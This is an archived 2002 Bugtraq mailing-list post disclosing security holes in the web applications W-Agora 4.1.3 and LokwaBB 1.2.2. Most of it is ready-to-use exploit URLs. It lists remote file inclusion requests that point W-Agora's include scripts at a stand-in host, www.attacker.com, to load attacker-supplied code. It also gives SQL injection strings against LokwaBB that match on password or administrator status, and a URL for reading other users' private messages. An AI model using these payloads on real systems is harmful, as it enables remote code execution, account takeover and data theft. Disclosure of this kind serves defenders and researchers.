[25697] in bugtraq
Security holes in LokwaBB and W-Agora
daemon@ATHENA.MIT.EDU (Frog Man)
Sat Jun 8 13:42:15 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Date: Sat, 08 Jun 2002 13:43:21 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F164WirVUCHPW2OXC4O00017bc7@hotmail.com>
Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do
it :) I just hope that doesn't give more work to the webmasters.
Product 1 :
***********
W-Agora 4.1.3
http://www.w-agora.net
Problem :
- Including file
Exploits :
- With a file http://www.attacker.com/dbaccess.txt :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt
- With a file http://www.attacker.com/postgres65.txt :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt
- With the file http://www.attacker.com/auth.txt :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt
More details in french :
http://www.ifrance.com/kitetoua/tuto/W-Agora.txt
Translated by Goolge :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
Product 2 :
***********
LokwaBB 1.2.2
http://lokwa.farcom.com/
Problems :
- XSS
- Privates messages reading
- SQL Injection
Exploits :
-
http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
-
http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
- misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]
More details in french :
http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
Sorry for my poor english :)
frog-m@n
_________________________________________________________________
Téléchargez MSN Explorer gratuitement à l'adresse
http://explorer.msn.fr/intl.asp.
